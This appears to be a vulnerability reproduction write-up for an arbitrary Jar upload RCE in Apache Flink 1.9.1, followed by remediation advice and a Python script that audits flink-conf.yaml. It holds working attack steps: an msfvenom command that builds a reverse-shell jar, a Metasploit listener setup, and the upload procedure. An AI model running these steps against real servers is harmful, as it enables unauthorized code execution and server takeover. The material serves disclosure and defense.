Title: Apache Flink Arbitrary Jar package upload results in RCE vulnerability

Apache Flink arbitrary Jar upload leading to RCE vulnerability

Apache Flink is a distributed big data processing engine that performs stateful computations over bounded and unbounded data streams. It can be deployed in a variety of cluster environments and computes quickly over data of any scale.

Apache Flink is an open source stream processing framework developed by the Apache Software Foundation. Its core is a distributed streaming dataflow engine written in Java and Scala. Flink executes arbitrary dataflow programs in a data-parallel and pipelined manner. Flink's pipelined runtime system can execute both batch and streaming programs. In addition, the Flink runtime itself supports the execution of iterative algorithms.

An attacker can use this vulnerability to upload any Jar package through the Apache Flink Dashboard page and use Metasploit to execute arbitrary code on the Apache Flink server, obtaining the highest permissions on the server, so the impact is severe.

Affected versions

Apache Flink=1.9.1

Environment setup

Download the Apache Flink 1.9.1 package:

wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

Unpack the installation package:

tar -zxvf flink-1.9.1-bin-scala_2.11.tgz

Enter the bin directory and start Flink:

./start-cluster.sh

Open the Dashboard in a browser: http://IP:8081

Vulnerability reproduction

Generate a reverse shell payload with msfvenom:

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar shell.jar

Set up the listener in msf:

use exploit/multi/handler
set payload java/shell/reverse_tcp
exploit

Upload shell.jar in the Dashboard and submit it.

The reverse shell connects back to the listener.

Remediation

Upgrade Apache Flink to the latest version
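
A defender-side check to go with the remediation above (an added example, not part of the original post): it audits a flink-conf.yaml for the two settings that decide whether the Dashboard on port 8081 accepts Jar uploads from the network. The option names web.submit.enable and rest.bind-address are Flink configuration keys that the post does not mention; the sample files are constructed, and an unset bind address is assumed to mean "all interfaces", consistent with the http://IP:8081 access shown above.

```python
"""Audit flink-conf.yaml for settings that expose Dashboard jar submission."""

# Constructed sample resembling an unmodified flink-conf.yaml (not from the post).
SAMPLE_DEFAULT = """\
jobmanager.rpc.address: localhost
rest.port: 8081
#web.submit.enable: false
"""

# Constructed sample with both hardening settings applied.
SAMPLE_HARDENED = """\
rest.port: 8081
rest.bind-address: 127.0.0.1
web.submit.enable: false   # disable jar upload/run through the web UI
"""

LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def parse_flink_conf(text):
    """Parse Flink's flat 'key: value' config; later duplicates win."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        conf[key.strip()] = value.strip()
    return conf


def audit(text):
    """Return a list of findings; an empty list means both checks pass."""
    conf = parse_flink_conf(text)
    findings = []
    # Assumption: web submission is enabled unless explicitly set to false.
    if conf.get("web.submit.enable", "true").lower() != "false":
        findings.append("web.submit.enable is not false: Dashboard accepts jar uploads")
    # Assumption: an unset bind address means the REST endpoint listens on all interfaces.
    bind = conf.get("rest.bind-address", "0.0.0.0")
    if bind not in LOOPBACK:
        port = conf.get("rest.port", "8081")
        findings.append(f"REST/Dashboard reachable on {bind}:{port}: restrict it or front it with auth")
    return findings


if __name__ == "__main__":
    for name, sample in (("default", SAMPLE_DEFAULT), ("hardened", SAMPLE_HARDENED)):
        print(name, audit(sample) or "OK")
```

Run it against the conf/flink-conf.yaml of each JobManager by passing the file contents to audit(); any finding means the Dashboard should be restricted before it is reachable from untrusted networks.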
